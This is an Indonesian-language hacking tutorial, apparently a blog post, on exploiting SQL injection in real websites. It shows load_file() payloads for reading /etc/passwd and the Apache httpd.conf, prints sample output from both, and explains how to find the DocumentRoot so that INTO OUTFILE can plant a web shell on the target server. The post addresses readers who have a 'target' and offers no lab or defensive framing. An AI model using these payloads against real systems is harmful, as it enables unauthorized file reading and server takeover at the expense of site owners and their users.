-
Hai sobat.
Saya ikal
Disini saya akan share sesuatu.
-
Kalian pasti pernah mendapat website yang vuln terhadap SQL injection, dan saat di cek user dan user privilage nya kalian mendapatkan kata Y yang berarti bisa berlanjut melakukan INTO OUTFILE ke dalam server. Namun kalian bingung untuk menemukan path untuk spawn shell kalian, kalian pun menggunakan teknik load file dan membaca /etc/passwd yang ada didalam server. Dan saat file /etc/passwd muncul, kalian masih bingung yang mana document_root dari website target kalian.
Okeh langsung saja
Pertama kalian harus punya target, lalu inject dan cek user dan user privilage dari target kalian.
Lalu lakukan load_file('/etc/passwd')
load_file('/etc/passwd'),4+from+mysql.user--+-
dan jika muncul, maka akan muncul kira-kira seperti ini.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:997:995:User for polkitd:/:/sbin/nologin colord:x:996:993:User for colord:/var/lib/colord:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin unbound:x:995:992:Unbound DNS resolver:/etc/unbound:/sbin/nologin
Nah kira-kira akan muncul seperti itu yah.
Lalu kalian bingung yang mana document_root dari server target kalian, coba trik ini
load_file('/etc/httpd/conf/httpd.conf'),4+from+mysql.user--+-
Nah, cukup ganti passwd menjadi httpd/conf/httpd.conf
Dan jika berhasil akan muncul seperti ini
# # This is the main Apache HTTP server configuration file. It contains the # configuration directives that give the server its instructions. # See <URL:http://httpd.apache.org/docs/2.4/> for detailed information. # In particular, see # <URL:http://httpd.apache.org/docs/2.4/mod/directives.html> # for a discussion of each configuration directive. # # Do NOT simply read the instructions in here without understanding # what they do. They're here only as hints or reminders. If you are unsure # consult the online docs. You have been warned. # # Configuration and logfile names: If the filenames you specify for many # of the server's control files begin with "/" (or "drive:/" for Win32), the # server will use that explicit path. If the filenames do *not* begin # with "/", the value of ServerRoot is prepended -- so 'log/access_log' # with ServerRoot set to '/www' will be interpreted by the # server as '/www/log/access_log', where as '/log/access_log' will be # interpreted as '/log/access_log'. # # ServerRoot: The top of the directory tree under which the server's # configuration, error, and log files are kept. # # Do not add a slash at the end of the directory path. If you point # ServerRoot at a non-local disk, be sure to specify a local disk on the # Mutex directive, if file-based mutexes are used. If you wish to share the # same ServerRoot for multiple httpd daemons, you will need to change at # least PidFile. # ServerRoot "/etc/httpd" # # Listen: Allows you to bind Apache to specific IP addresses and/or # ports, instead of the default. See also the
Nah akan muncul seperti itu, aslinya panjang sekali :'v, cuma saya salin segitu saja.
Dan jika ingin menemukan document_rootnya, kalian tinggal klik titik 3 di bagian pojok kanan atas lalu klik search in tab lalu ketik DOCUMENTROOT Dan fiola tinggal kalian salin yang kalian dapat (document rootnya), lalu lakukan into outfile.
Yaps mungkin segini aja
Thanks
See u
